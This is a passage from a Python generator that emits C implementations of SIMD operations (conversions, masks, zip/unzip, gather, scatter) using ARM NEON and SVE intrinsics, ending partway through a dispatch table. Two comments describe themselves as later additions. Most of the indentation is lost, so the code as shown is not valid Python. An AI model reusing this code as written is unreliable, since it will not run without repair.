elif (from_typ in common.itypes and to_typ in common.itypes) or \
(from_typ in common.utypes and to_typ in common.utypes):
return '''return vcombine_{suf_to_typ}(vmovn_{suf}({in0}),
vmovn_{suf}({in1}));'''. \
format(suf_to_typ=suf(to_typ), **fmtspec)
        elif (from_typ in common.itypes and to_typ in common.utypes) or \
             (from_typ in common.utypes and to_typ in common.itypes):
            return '''return vreinterpretq_{suf_to_typ}_{suf_int_typ}(
                              vcombine_{suf_int_typ}(vmovn_{suf}({in0}),
                                                     vmovn_{suf}({in1})));'''. \
                   format(suf_to_typ=suf(to_typ),
                          suf_int_typ=suf(from_typ[0] + to_typ[1:]), **fmtspec)
else:
return \
'''return nsimd_downcvt_{simd_ext}_{to_typ}_{int_typ}(
nsimd_cvt_{simd_ext}_{int_typ}_{from_typ}({in0}),
nsimd_cvt_{simd_ext}_{int_typ}_{from_typ}({in1}));'''.\
format(int_typ=to_typ[0] + from_typ[1:], **fmtspec)
# Getting here means that we deal with SVE
if from_typ in common.iutypes and to_typ in common.iutypes:
return '''return svuzp1_{suf_to_typ}(
svreinterpret_{suf_to_typ}_{suf}({in0}),
svreinterpret_{suf_to_typ}_{suf}({in1}));'''. \
format(suf_to_typ=suf(to_typ), **fmtspec)
elif from_typ in common.ftypes and to_typ in common.iutypes:
return \
'''return svuzp1_{suf_to_typ}(svreinterpret_{suf_to_typ}_{suf_int_typ}(
svcvt_{suf_int_typ}_{suf}_x({svtrue}, {in0})),
svreinterpret_{suf_to_typ}_{suf_int_typ}(
svcvt_{suf_int_typ}_{suf}_x({svtrue}, {in1})));'''. \
format(suf_to_typ=suf(to_typ),
suf_int_typ=suf(to_typ[0] + from_typ[1:]),
**fmtspec)
else:
return \
'''return svuzp1_{suf_to_typ}(svcvt_{suf_to_typ}_{suf}_x(
{svtrue}, {in0}), svcvt_{suf_to_typ}_{suf}_x(
{svtrue}, {in1}));'''. \
format(suf_to_typ=suf(to_typ), **fmtspec)
# -----------------------------------------------------------------------------
# adds
def adds(simd_ext, from_typ):
if from_typ in common.ftypes:
return 'return nsimd_add_{simd_ext}_{from_typ}({in0}, {in1});'. \
format(**fmtspec)
if simd_ext in neon:
return 'return vqaddq_{suf}({in0}, {in1});'.format(**fmtspec)
else:
return 'return svqadd_{suf}({in0}, {in1});'.format(**fmtspec)
# -----------------------------------------------------------------------------
# subs
def subs(simd_ext, from_typ):
if from_typ in common.ftypes:
return 'return nsimd_sub_{simd_ext}_{from_typ}({in0}, {in1});'. \
format(**fmtspec)
elif simd_ext in neon:
return 'return vqsubq_{suf}({in0}, {in1});'.format(**fmtspec)
else:
return 'return svqsub_{suf}({in0}, {in1});'.format(**fmtspec)
# -----------------------------------------------------------------------------
# to_mask
def to_mask1(opts, simd_ext, typ):
if typ in common.itypes + common.ftypes:
normal = 'return vreinterpretq_{suf}_u{typnbits}({in0});'. \
format(**fmtspec)
else:
normal = 'return {in0};'.format(**fmtspec)
emulate_f16 = '''nsimd_{simd_ext}_vf16 ret;
ret.v0 = nsimd_to_mask_{simd_ext}_f32({in0}.v0);
ret.v1 = nsimd_to_mask_{simd_ext}_f32({in0}.v1);
return ret;'''.format(**fmtspec)
if simd_ext == 'neon128' and typ == 'f16':
return emulate_f16
elif simd_ext == 'neon128' and typ == 'f64':
return '''nsimd_neon128_vf64 ret;
ret.v0 = nsimd_scalar_reinterpret_f64_u64({in0}.v0);
ret.v1 = nsimd_scalar_reinterpret_f64_u64({in0}.v1);
return ret;'''.format(**fmtspec)
elif simd_ext == 'aarch64' and typ == 'f16':
return '''#ifdef NSIMD_ARM_FP16
{normal}
#else
{emulate_f16}
#endif'''.format(normal=normal, emulate_f16=emulate_f16)
elif simd_ext in sve:
if opts.sve_emulate_bool:
return 'return svreinterpret_{suf}_u{typnbits}({in0});'. \
format(**fmtspec)
else:
utyp = 'u{}'.format(fmtspec['typnbits'])
return '''return svreinterpret_{suf}_{utyp}(svsel_{utyp}(
{in0}, svdup_n_{utyp}(({utyp})-1),
svdup_n_{utyp}(({utyp})0)));'''. \
format(utyp=utyp, **fmtspec)
else:
return normal
# -----------------------------------------------------------------------------
# iota
def iota(simd_ext, typ):
if simd_ext in sve:
if typ in common.iutypes:
return 'return svindex_{suf}(0, 1);'.format(**fmtspec)
else:
return \
'''return svcvt_{suf}_s{typnbits}_x({svtrue},
svindex_s{typnbits}(0, 1));'''.format(**fmtspec)
if typ == 'f64' and simd_ext == 'neon128':
return '''nsimd_neon128_vf64 ret;
ret.v0 = 0.0;
ret.v1 = 1.0;
return ret;'''.format(**fmtspec)
typ2 = 'f32' if typ == 'f16' else typ
le = 128 // int(typ[1:])
iota = ', '.join(['({typ2}){i}'.format(typ2=typ2, i=i) \
for i in range(le)])
normal = '''{typ} buf[{le}] = {{ {iota} }};
return vld1q_{suf}(buf);'''. \
format(le=le, iota=iota, **fmtspec)
if typ == 'f16':
return '''#ifdef NSIMD_ARM_FP16
{normal}
#else
f32 buf[8] = {{ {iota} }};
nsimd_{simd_ext}_vf16 ret;
ret.v0 = vld1q_f32(buf);
ret.v1 = vld1q_f32(buf + 4);
return ret;
#endif'''.format(iota=iota, normal=normal, **fmtspec)
return normal
# -----------------------------------------------------------------------------
# mask_for_loop_tail
def mask_for_loop_tail(simd_ext, typ):
if typ == 'f16':
threshold = 'nsimd_f32_to_f16((f32)({in1} - {in0}))'.format(**fmtspec)
else:
threshold = '({typ})({in1} - {in0})'.format(**fmtspec)
if simd_ext == 'sve':
le = 'nsimd_len_sve_{typ}()'.format(**fmtspec)
elif simd_ext in fixed_sized_sve:
le = int(simd_ext[3:]) // int(typ[1:])
else:
le = 128 // int(typ[1:])
return '''if ({in0} >= {in1}) {{
return nsimd_set1l_{simd_ext}_{typ}(0);
}}
if ({in1} - {in0} < {le}) {{
nsimd_{simd_ext}_v{typ} n =
nsimd_set1_{simd_ext}_{typ}({threshold});
return nsimd_lt_{simd_ext}_{typ}(
nsimd_iota_{simd_ext}_{typ}(), n);
}} else {{
return nsimd_set1l_{simd_ext}_{typ}(1);
}}'''.format(le=le, threshold=threshold, **fmtspec)
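# Usage sketch (added note, not in the original generator): the emitted mask is meant to
# guard the last partial iteration of a strip-mined loop in generated C, roughly
#     for (i = 0; i + len <= n; i += len) { /* full-width iterations */ }
#     mask = nsimd_mask_for_loop_tail_aarch64_f32(i, n);
#     /* use masked loads/stores for the remaining n - i elements */
# (function naming assumed from the nsimd_<op>_<simd_ext>_<typ> convention used above).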
# -----------------------------------------------------------------------------
# to_logical
def to_logical1(opts, simd_ext, typ):
if typ in common.iutypes:
return '''return nsimd_ne_{simd_ext}_{typ}({in0},
nsimd_set1_{simd_ext}_{typ}(({typ})0));'''. \
format(**fmtspec)
normal_fp = \
'''return nsimd_reinterpretl_{simd_ext}_{suf}_{utyp}(
nsimd_ne_{simd_ext}_{utyp}(
nsimd_reinterpret_{simd_ext}_{utyp}_{typ}(
{in0}), nsimd_set1_{simd_ext}_{utyp}(({utyp})0)));'''. \
format(utyp='u{}'.format(fmtspec['typnbits']), **fmtspec)
if typ in ['f32', 'f64'] or (typ == 'f16' and simd_ext in sve):
return normal_fp
emulate_fp16 = \
'''nsimd_{simd_ext}_vlf16 ret;
ret.v0 = nsimd_to_logical_{simd_ext}_f32({in0}.v0);
ret.v1 = nsimd_to_logical_{simd_ext}_f32({in0}.v1);
return ret;'''.format(**fmtspec)
if simd_ext == 'aarch64':
return '''#ifdef NSIMD_ARM_FP16
{normal_fp}
#else
{emulate_fp16}
#endif'''.format(normal_fp=normal_fp,
emulate_fp16=emulate_fp16)
elif simd_ext == 'neon128':
return emulate_fp16
# -----------------------------------------------------------------------------
# unpack functions
def zip_unzip_half(func, simd_ext, typ):
if simd_ext == 'aarch64' or simd_ext in sve:
        if typ == 'f16' and simd_ext == 'aarch64':
if func in ['zip1', 'zip2']:
return '''\
#ifdef NSIMD_ARM_FP16
return {s}v{op}{q}_{suf}({in0}, {in1});
#else
nsimd_{simd_ext}_v{typ} ret;
ret.v0 = {s}vzip1{q}_f32({in0}.v{i}, {in1}.v{i});
ret.v1 = {s}vzip2{q}_f32({in0}.v{i}, {in1}.v{i});
return ret;
#endif
'''.format(op=func,
i = '0' if func in ['zip1', 'uzp1'] else '1',
s = 's' if simd_ext in sve else '',
q = '' if simd_ext in sve else 'q', **fmtspec)
else:
return '''\
#ifdef NSIMD_ARM_FP16
return {s}v{op}{q}_{suf}({in0}, {in1});
#else
nsimd_{simd_ext}_v{typ} ret;
ret.v0 = {s}v{func}{q}_f32({in0}.v0, {in0}.v1);
ret.v1 = {s}v{func}{q}_f32({in1}.v0, {in1}.v1);
return ret;
#endif'''.format(op=func, func=func,
s = 's' if simd_ext in sve else '',
q = '' if simd_ext in sve else 'q', **fmtspec)
else:
return 'return {s}v{op}{q}_{suf}({in0}, {in1});'. \
format(op=func, s = 's' if simd_ext in sve else '',
q = '' if simd_ext in sve else 'q', **fmtspec)
elif simd_ext == 'neon128':
armop = {'zip1': 'zipq', 'zip2': 'zipq', 'uzp1': 'uzpq',
'uzp2': 'uzpq'}
prefix = { 'i': 'int', 'u': 'uint', 'f': 'float' }
neon_typ = '{}{}x{}x2_t'. \
format(prefix[typ[0]], typ[1:], 128 // int(typ[1:]))
if typ == 'f16':
if func in ['zip1', 'zip2']:
return '''\
nsimd_{simd_ext}_v{typ} ret;
float32x4x2_t tmp = v{op}_f32({in0}.v{i}, {in1}.v{i});
ret.v0 = tmp.val[0];
ret.v1 = tmp.val[1];
return ret;
'''.format(i = '0' if func == 'zip1' else '1',
op=armop[func], **fmtspec)
else:
return '''\
nsimd_{simd_ext}_v{typ} ret;
float32x4x2_t tmp0 = vuzpq_f32({in0}.v0, {in0}.v1);
float32x4x2_t tmp1 = vuzpq_f32({in1}.v0, {in1}.v1);
ret.v0 = tmp0.val[{i}];
ret.v1 = tmp1.val[{i}];
return ret;
'''.format(i = '0' if func == 'uzp1' else '1', **fmtspec)
elif typ in ['i64', 'u64']:
return '''\
{typ} buf0[2], buf1[2];
{typ} ret[2];
vst1q_{suf}(buf0, {in0});
vst1q_{suf}(buf1, {in1});
ret[0] = buf0[{i}];
ret[1] = buf1[{i}];
return vld1q_{suf}(ret);'''. \
format(**fmtspec, i= '0' if func in ['zip1', 'uzp1'] else '1')
elif typ == 'f64' :
return '''\
nsimd_{simd_ext}_v{typ} ret;
ret.v0 = {in0}.v{i};
ret.v1 = {in1}.v{i};
return ret;'''. \
format(**fmtspec, i= '0' if func in ['zip1', 'uzp1'] else '1')
else :
return '''\
{neon_typ} res;
res = v{op}_{suf}({in0}, {in1});
return res.val[{i}];'''. \
format(neon_typ=neon_typ, op=armop[func], **fmtspec,
i = '0' if func in ['zip1', 'uzp1'] else '1')
def zip_unzip(func, simd_ext, typ):
lo_hi = '''\
nsimd_{simd_ext}_v{typ}x2 ret;
ret.v0 = nsimd_{func}lo_{simd_ext}_{typ}({in0}, {in1});
ret.v1 = nsimd_{func}hi_{simd_ext}_{typ}({in0}, {in1});
return ret;
'''.format(func='zip' if func == 'zip' else 'unzip', **fmtspec)
if simd_ext == 'aarch64' or simd_ext in sve:
content = '''\
nsimd_{simd_ext}_v{typ}x2 ret;
ret.v0 = {s}v{func}1{q}_{suf}({in0}, {in1});
ret.v1 = {s}v{func}2{q}_{suf}({in0}, {in1});
return ret;'''.format(s = 's' if simd_ext in sve else '',
q = '' if simd_ext in sve else 'q',
func=func, **fmtspec)
if typ == 'f16':
return '''\
#ifdef NSIMD_ARM_FP16
{c}
#else
{default}
#endif'''.\
format(c=content, default=lo_hi, s = 's' if simd_ext in sve else '',
**fmtspec)
else:
return content
else:
prefix = { 'i': 'int', 'u': 'uint', 'f': 'float' }
neon_typ = '{}{}x{}x2_t'.\
format(prefix[typ[0]], typ[1:], 128 // int(typ[1:]))
content = '''\
nsimd_{simd_ext}_v{typ}x2 ret;
{neon_typ} tmp = v{func}q_{suf}({in0}, {in1});
ret.v0 = tmp.val[0];
ret.v1 = tmp.val[1];
return ret;'''\
.format(func=func, neon_typ=neon_typ, **fmtspec)
if typ in ['u64', 'i64', 'f64']:
return lo_hi
elif typ == 'f16':
return '''\
#ifdef NSIMD_ARM_FP16
{content}
#else
{default}
#endif'''.\
format(content=content, default=lo_hi,
f='zip' if func == 'zip' else 'unzip', **fmtspec)
else:
return content
# -----------------------------------------------------------------------------
# gather
def gather(simd_ext, typ):
le = max_len(simd_ext, typ)
real_le = real_len(simd_ext, typ)
if simd_ext in sve:
emul = '''int i;
{typ} buf[{le}];
i{typnbits} offset_buf[{le}];
svst1_s{typnbits}({svtrue}, offset_buf, {in1});
for (i = 0; i < {real_le}; i++) {{
buf[i] = {in0}[offset_buf[i]];
}}
return svld1_{suf}({svtrue}, buf);'''. \
format(le=le, real_le=real_le, **fmtspec)
else:
emul = \
'''nsimd_{simd_ext}_v{typ} ret;
ret = vdupq_n_{suf}({in0}[vgetq_lane_s{typnbits}({in1}, 0)]);'''. \
format(**fmtspec) + ''.join([
'''ret = vsetq_lane_{suf}({in0}[
vgetq_lane_s{typnbits}({in1}, {i})], ret, {i});\n'''. \
format(i=i, **fmtspec) for i in range(1, le)]) + \
'return ret;'
if typ == 'f16':
if simd_ext in sve:
return emul
return '''#ifdef NSIMD_ARM_FP16
{emul}
#else
nsimd_{simd_ext}_vf16 ret;
f32 buf[8];
'''.format(emul=emul, **fmtspec) + \
''.join(['buf[{i}] = nsimd_f16_to_f32({in0}[' \
'vgetq_lane_s16({in1}, {i})]);\n'. \
format(i=i, **fmtspec) for i in range(4)]) + \
''.join(['buf[4 + {i}] = nsimd_f16_to_f32({in0}[' \
'vgetq_lane_s16({in1}, 4 + {i})]);\n'. \
format(i=i, **fmtspec) for i in range(4)]) + \
''' ret.v0 = vld1q_f32(buf);
ret.v1 = vld1q_f32(buf + 4);
return ret;
#endif'''.format(**fmtspec)
if simd_ext == 'neon128' and typ == 'f64':
return '''nsimd_neon128_vf64 ret;
i64 offset_buf[2];
vst1q_s64(offset_buf, {in1});
ret.v0 = {in0}[offset_buf[0]];
ret.v1 = {in0}[offset_buf[1]];
return ret;'''.format(**fmtspec)
if simd_ext in neon or typ in ['i8', 'u8', 'i16', 'u16']:
return emul
# getting here means SVE
return 'return svld1_gather_s{typnbits}index_{suf}({svtrue}, {in0}, ' \
'{in1});'.format(**fmtspec)
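# Illustration (added note, not in the original generator): on SVE with a 32-bit or
# 64-bit type the gather maps to a single intrinsic, e.g. gather('sve', 'f32') is
# expected to emit roughly
#     return svld1_gather_s32index_f32(svptrue_b32(), a0, a1);
# where a0 is the base pointer and a1 the index vector (a0/a1 assumed for the args).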
# -----------------------------------------------------------------------------
# linear gather
def gather_linear(simd_ext, typ):
if simd_ext in sve:
if typ in ['i8', 'u8', 'i16', 'u16', 'f16']:
le = max_len(simd_ext, typ)
real_le = real_len(simd_ext, typ)
return '''{typ} buf[{le}];
int i;
for (i = 0; i < {real_le}; i++) {{
buf[i] = {in0}[i * {in1}];
}}
return svld1_{suf}({svtrue}, buf);'''. \
format(le=le, real_le=real_le, **fmtspec)
else:
return 'return svld1_gather_s{typnbits}index_{suf}({svtrue}, ' \
'{in0}, svindex_s{typnbits}(0, (i{typnbits}){in1}));'. \
format(**fmtspec)
# getting here means neon128 and aarch64
intrinsic = '''nsimd_{simd_ext}_v{typ} ret;
ret = vdupq_n_{suf}({in0}[0]);
'''.format(**fmtspec) + ''.join([
'ret = vsetq_lane_{suf}({in0}[{i} * {in1}], ret, {i});\n'. \
format(i=i, **fmtspec) \
for i in range(1, 128 // int(fmtspec['typnbits']))]) + \
'''return ret;'''
if typ == 'f16':
return '''#ifdef NSIMD_ARM_FP16
{intrinsic}
#else
nsimd_{simd_ext}_vf16 ret;
f32 buf[8];
int i;
for (i = 0; i < 8; i++) {{
buf[i] = nsimd_f16_to_f32({in0}[i * {in1}]);
}}
ret.v0 = vld1q_f32(buf);
ret.v1 = vld1q_f32(buf + 4);
return ret;
#endif'''.format(intrinsic=intrinsic, **fmtspec)
if typ == 'f64' and simd_ext == 'neon128':
return '''nsimd_neon128_vf64 ret;
ret.v0 = {in0}[0];
ret.v1 = {in0}[{in1}];
return ret;'''.format(**fmtspec)
return intrinsic
# -----------------------------------------------------------------------------
# masked gather
def maskoz_gather(oz, simd_ext, typ):
le = max_len(simd_ext, typ)
real_le = real_len(simd_ext, typ)
if simd_ext in sve:
utyp = 'u{typnbits}'.format(**fmtspec)
store = '''svst1_s{typnbits}({svtrue}, offset_buf, {in2});
svst1_{utyp}({svtrue}, mask, svsel_{utyp}(
{in0}, svdup_n_{utyp}(({utyp})-1), svdup_n_{utyp}(
({utyp})0)));
'''.format(utyp=utyp, **fmtspec)
if oz == 'z':
store += 'svst1_{suf}({svtrue}, buf, svdup_n_{suf}(({typ})0));'. \
format(**fmtspec)
else:
store += 'svst1_{suf}({svtrue}, buf, {in3});'.format(**fmtspec)
load = 'svld1_{suf}({svtrue}, buf)'.format(**fmtspec)
else:
store = '''vst1q_s{typnbits}(offset_buf, {in2});
vst1q_u{typnbits}(mask, {in0});'''.format(**fmtspec)
if oz == 'z':
store += 'vst1q_{suf}(buf, vdupq_n_{suf}(({typ})0));'. \
format(**fmtspec)
else:
store += 'vst1q_{suf}(buf, {in3});'.format(**fmtspec)
load = 'vld1q_{suf}(buf)'.format(**fmtspec)
emul = '''int i;
{typ} buf[{le}];
u{typnbits} mask[{le}];
i{typnbits} offset_buf[{le}];
{store}
for (i = 0; i < {real_le}; i++) {{
if (mask[i]) {{
buf[i] = {in1}[offset_buf[i]];
}}
}}
return {load};'''. \
format(le=le, real_le=real_le, store=store, load=load, **fmtspec)
if typ == 'f16':
if simd_ext in sve:
return emul
if oz == 'z':
oz0 = 'vdupq_n_f32(0.0f)'
oz1 = oz0
else:
oz0 = '{in3}.v0'.format(**fmtspec)
oz1 = '{in3}.v1'.format(**fmtspec)
return '''#ifdef NSIMD_ARM_FP16
{emul}
#else
nsimd_{simd_ext}_vf16 ret;
int i;
f32 buf[{le}];
u32 mask[{le}];
i16 offset_buf[{le}];
vst1q_s16(offset_buf, {in2});
vst1q_f32(buf, {oz0});
vst1q_f32(buf + {leo2}, {oz1});
vst1q_u32(mask, {in0}.v0);
vst1q_u32(mask + {leo2}, {in0}.v1);
for (i = 0; i < {le}; i++) {{
if (mask[i]) {{
buf[i] = nsimd_f16_to_f32({in1}[offset_buf[i]]);
}}
}}
ret.v0 = vld1q_f32(buf);
ret.v1 = vld1q_f32(buf + {leo2});
return ret;
#endif'''.format(emul=emul, leo2=le // 2, le=le, oz0=oz0,
oz1=oz1, **fmtspec)
if simd_ext == 'neon128' and typ == 'f64':
oz0 = '0.0' if oz == 'z' else '{in3}.v0'.format(**fmtspec)
oz1 = '0.0' if oz == 'z' else '{in3}.v1'.format(**fmtspec)
return '''nsimd_neon128_vf64 ret;
i64 offset_buf[2];
vst1q_s64(offset_buf, {in2});
if ({in0}.v0) {{
ret.v0 = {in1}[offset_buf[0]];
}} else {{
ret.v0 = {oz0};
}}
if ({in0}.v1) {{
ret.v1 = {in1}[offset_buf[1]];
}} else {{
ret.v1 = {oz1};
}}
return ret;'''.format(oz0=oz0, oz1=oz1, **fmtspec)
if simd_ext in neon or typ in ['i8', 'u8', 'i16', 'u16']:
return emul
# getting here means SVE
oz0 = 'svdup_n_{suf}(({typ})0)'.format(**fmtspec) if oz == 'z' \
else '{in3}'.format(**fmtspec)
return '''return svsel_{suf}({in0}, svld1_gather_s{typnbits}index_{suf}(
{in0}, {in1}, {in2}), {oz0});'''. \
format(oz0=oz0, **fmtspec)
# -----------------------------------------------------------------------------
# scatter
def scatter(simd_ext, typ):
le = max_len(simd_ext, typ)
real_le = real_len(simd_ext, typ)
if simd_ext in sve:
emul = '''int i;
{typ} buf[{le}];
i{typnbits} offset_buf[{le}];
svst1_s{typnbits}({svtrue}, offset_buf, {in1});
svst1_{suf}({svtrue}, buf, {in2});
for (i = 0; i < {real_le}; i++) {{
{in0}[offset_buf[i]] = buf[i];
}}'''.format(le=le, real_le=real_le, **fmtspec)
else:
emul = '\n'.join(['{in0}[vgetq_lane_s{typnbits}({in1}, {i})] = ' \
'vgetq_lane_{suf}({in2}, {i});\n'. \
format(i=i, **fmtspec) for i in range(int(le))])
if typ == 'f16':
if simd_ext in sve:
return emul
return '''#ifdef NSIMD_ARM_FP16
{emul}
#else
'''.format(emul=emul) + \
'\n'.join(['{in0}[vgetq_lane_s16({in1}, {i})] = ' \
'nsimd_f32_to_f16(vgetq_lane_f32({in2}.v0, '
'{i}));\n'.format(i=i, **fmtspec) \
for i in range(4)]) + \
'\n'.join(['{in0}[vgetq_lane_s16({in1}, 4 + {i})] = ' \
'nsimd_f32_to_f16(vgetq_lane_f32({in2}.v1, '
'{i}));\n'.format(i=i, **fmtspec) \
for i in range(4)]) + \
'''
#endif'''
if simd_ext == 'neon128' and typ == 'f64':
return '''i64 offset_buf[2];
vst1q_s64(offset_buf, {in1});
{in0}[offset_buf[0]] = {in2}.v0;
{in0}[offset_buf[1]] = {in2}.v1;'''.format(**fmtspec)
if simd_ext in neon or typ in ['i8', 'u8', 'i16', 'u16']:
return emul
# getting here means SVE
return 'svst1_scatter_s{typnbits}index_{suf}({svtrue}, {in0}, ' \
'{in1}, {in2});'.format(le=le, **fmtspec)
# -----------------------------------------------------------------------------
# linear scatter
def scatter_linear(simd_ext, typ):
if simd_ext in sve:
if typ in ['i8', 'u8', 'i16', 'u16', 'f16']:
le = max_len(simd_ext, typ)
real_le = real_len(simd_ext, typ)
return '''{typ} buf[{le}];
int i;
svst1_{suf}({svtrue}, buf, {in2});
for (i = 0; i < {real_le}; i++) {{
{in0}[i * {in1}] = buf[i];
}}'''.format(le=le, real_le=real_le, **fmtspec)
else:
return 'svst1_scatter_s{typnbits}index_{suf}({svtrue}, {in0}, ' \
'svindex_s{typnbits}(0, (i{typnbits}){in1}), {in2});'. \
format(**fmtspec)
# getting here means neon128 and aarch64
intrinsic = '\n'.join([
'{in0}[{i} * {in1}] = vgetq_lane_{suf}({in2}, {i});'. \
format(i=i, **fmtspec) for i in range(128 // int(fmtspec['typnbits']))])
if typ == 'f16':
return '''#ifdef NSIMD_ARM_FP16
{intrinsic}
#else
f32 buf[8];
int i;
vst1q_f32(buf, {in2}.v0);
vst1q_f32(buf + 4, {in2}.v1);
for (i = 0; i < 8; i++) {{
{in0}[i * {in1}] = nsimd_f32_to_f16(buf[i]);
}}
#endif'''.format(intrinsic=intrinsic, **fmtspec)
if typ == 'f64' and simd_ext == 'neon128':
return '''{in0}[0] = {in2}.v0;
{in0}[{in1}] = {in2}.v1;'''.format(**fmtspec)
return intrinsic
# -----------------------------------------------------------------------------
# mask_scatter
def mask_scatter(simd_ext, typ):
le = max_len(simd_ext, typ)
real_le = real_len(simd_ext, typ)
if simd_ext in sve:
store = '''svst1_s{typnbits}({svtrue}, offset_buf, {in2});
svst1_u{typnbits}({svtrue}, mask, svsel_u{typnbits}(
{in0}, svdup_n_u{typnbits}((u{typnbits})1),
svdup_n_u{typnbits}((u{typnbits})0)));
svst1_{suf}({svtrue}, buf, {in3});'''.format(**fmtspec)
else:
store = '''vst1q_s{typnbits}(offset_buf, {in2});
vst1q_{suf}(buf, {in3});
vst1q_u{typnbits}(mask, {in0});'''.format(**fmtspec)
emul = '''int i;
{typ} buf[{le}];
u{typnbits} mask[{le}];
i{typnbits} offset_buf[{le}];
{store}
for (i = 0; i < {real_le}; i++) {{
if (mask[i]) {{
{in1}[offset_buf[i]] = buf[i];
}}
}}'''.format(le=le, real_le=real_le, store=store, **fmtspec)
if typ == 'f16':
if simd_ext in sve:
return emul
return '''#ifdef NSIMD_ARM_FP16
{emul}
#else
int i;
f32 buf[{le}];
u32 mask[{le}];
i16 offset_buf[{le}];
vst1q_s16(offset_buf, {in2});
vst1q_f32(buf, {in3}.v0);
vst1q_f32(buf + {leo2}, {in3}.v1);
vst1q_u32(mask, {in0}.v0);
vst1q_u32(mask + {leo2}, {in0}.v1);
for (i = 0; i < {le}; i++) {{
if (mask[i]) {{
{in1}[offset_buf[i]] = nsimd_f32_to_f16(buf[i]);
}}
}}
#endif'''.format(emul=emul, le=le, leo2=le // 2, **fmtspec)
if simd_ext == 'neon128' and typ == 'f64':
return '''i64 offset_buf[2];
vst1q_s64(offset_buf, {in2});
if ({in0}.v0) {{
{in1}[offset_buf[0]] = {in3}.v0;
}}
if ({in0}.v1) {{
{in1}[offset_buf[1]] = {in3}.v1;
}}'''.format(**fmtspec)
if simd_ext in neon or typ in ['i8', 'u8', 'i16', 'u16']:
return emul
# getting here means SVE
return 'svst1_scatter_s{typnbits}index_{suf}({in0}, {in1}, ' \
'{in2}, {in3});'.format(le=le, **fmtspec)
# -----------------------------------------------------------------------------
# get_impl function
def get_impl(opts, func, simd_ext, from_typ, to_typ):
global fmtspec
simd_ext2 = simd_ext if not simd_ext in fixed_sized_sve else 'sve'
fmtspec = {
'simd_ext': simd_ext,
'simd_ext2': simd_ext2,
'typ': from_typ,
'from_typ': from_typ,
'to_typ': to_typ,
'suf': suf(from_typ),
'in0': common.in0,
'in1': common.in1,
'in2': common.in2,
'in3': common.in3,
'in4': common.in4,
'in5': common.in5,
'typnbits': from_typ[1:],
'svtrue': 'svptrue_b{}()'.format(from_typ[1:]),
'svetyp': sve_typ(from_typ),
}
impls = {
'loada': lambda: load1234(opts, simd_ext, from_typ, 1),
'masko_loada1': lambda: maskoz_load('o', simd_ext, from_typ),
'maskz_loada1': lambda: maskoz_load('z', simd_ext, from_typ),
'load2a': lambda: load1234(opts, simd_ext, from_typ, 2),
'load3a': lambda: load1234(opts, simd_ext, from_typ, 3),
'load4a': lambda: load1234(opts, simd_ext, from_typ, 4),
'loadu': lambda: load1234(opts, simd_ext, from_typ, 1),
'masko_loadu1': lambda: maskoz_load('o', simd_ext, from_typ),
'maskz_loadu1': lambda: maskoz_load('z', simd_ext, from_typ),
'load2u': lambda: load1234(opts, simd_ext, from_typ, 2),
'load3u': lambda: load1234(opts, simd_ext, from_typ, 3),
'load4u': lambda: load1234(opts, simd_ext, from_typ, 4),
'storea': lambda: store1234(opts, simd_ext, from_typ, 1),
'mask_storea1': lambda: mask_store(simd_ext, from_typ),
'store2a': lambda: store1234(opts, simd_ext, from_typ, 2),
'store3a': lambda: store1234(opts, simd_ext, from_typ, 3),
'store4a': lambda: store1234(opts, simd_ext, from_typ, 4),
'storeu': lambda: store1234(opts, simd_ext, from_typ, 1),
'mask_storeu1': lambda: mask_store(simd_ext, from_typ),
'store2u': lambda: store1234(opts, simd_ext, from_typ, 2),
'store3u': lambda: store1234(opts, simd_ext, from_typ, 3),
'store4u': lambda: store1234(opts, simd_ext, from_typ, 4),
'gather': lambda: gather(simd_ext, from_typ),
'gather_linear': lambda: gather_linear(simd_ext, from_typ),
'maskz_gather': lambda: maskoz_gather('z', simd_ext, from_typ),
'masko_gather': lambda: maskoz_gather('o', simd_ext, from_typ),
'scatter': lambda: scatter(simd_ext, from_typ),
'scatter_linear': lambda: scatter_linear(simd_ext, from_typ),
'mask_scatter': lambda: mask_scatter(simd_ext, from_typ),
'andb': lambda: binop2("andb", simd_ext2, from_typ),
'xorb': lambda: binop2("xorb", simd_ext2, from_typ),
'orb': lambda: binop2("orb", simd_ext2, from_typ),
'andl': lambda: lop2(opts, "andl", simd_ext2, from_typ),
'xorl': lambda: lop2(opts, "xorl", simd_ext2, from_typ),
'orl': lambda: lop2(opts, "orl", simd_ext2, from_typ),
'notb': lambda: not1(simd_ext2, from_typ),
'notl': lambda: lnot1(opts, simd_ext2, from_typ),
'andnotb': lambda: binop2("andnotb", simd_ext2, from_typ),
'andnotl': lambda: lop2(opts, "andnotl", simd_ext2, from_typ),
'add': lambda: addsub("add", simd_ext2, from_typ),
'sub': lambda: addsub("sub", simd_ext2, from_typ),
'adds': lambda: adds(simd_ext2, from_typ),
'subs': lambda: subs(simd_ext2, from_typ),
'div': lambda: div2(simd_ext2, from_typ),
'sqrt': lambda: sqrt1(simd_ext2, from_typ),
'len': lambda: len1(simd_ext, from_typ),
'mul': lambda: mul2(simd_ext2, from_typ),
'shl': lambda: shl_shr("shl", simd_ext2, from_typ),
'shr': lambda: shl_shr("shr", simd_ext2, from_typ),
'shra': lambda: shra(simd_ext2, from_typ),
'set1': lambda: set1(simd_ext2, from_typ),
'set1l': lambda: lset1(simd_ext2, from_typ),
'eq': lambda: cmp2(opts, "eq", simd_ext2, from_typ),
'lt': lambda: cmp2(opts, "lt", simd_ext2, from_typ),
'le': lambda: cmp2(opts, "le", simd_ext2, from_typ),
'gt': lambda: cmp2(opts, "gt", simd_ext2, from_typ),
'ge': lambda: cmp2(opts, "ge", simd_ext2, from_typ),
'ne': lambda: neq2(opts, simd_ext2, from_typ),
'if_else1': lambda: if_else3(opts, simd_ext2, from_typ),
'min': lambda: minmax2("min", simd_ext2, from_typ),
'max': lambda: minmax2("max", simd_ext2, from_typ),
'loadla': lambda: loadl(True, simd_ext2, from_typ),
'loadlu': lambda: loadl(False, simd_ext2, from_typ),
'storela': lambda: storel(True, simd_ext2, from_typ),
'storelu': lambda: storel(False, simd_ext2, from_typ),
'abs': lambda: abs1(simd_ext2, from_typ),
'fma': lambda: fmafnma3("fma", simd_ext2, from_typ),
'fnma': lambda: fmafnma3("fnma", simd_ext2, from_typ),
'fms': lambda: fmsfnms3("fms", simd_ext2, from_typ),
'fnms': lambda: fmsfnms3("fnms", simd_ext2, from_typ),
'ceil': lambda: round1("ceil", simd_ext2, from_typ),
'floor': lambda: round1("floor", simd_ext2, from_typ),
'trunc': lambda: round1("trunc", simd_ext2, from_typ),
'round_to_even': lambda: round1("round_to_even", simd_ext2, from_typ),
'all': lambda: allany1(opts, "all", simd_ext2, from_typ),
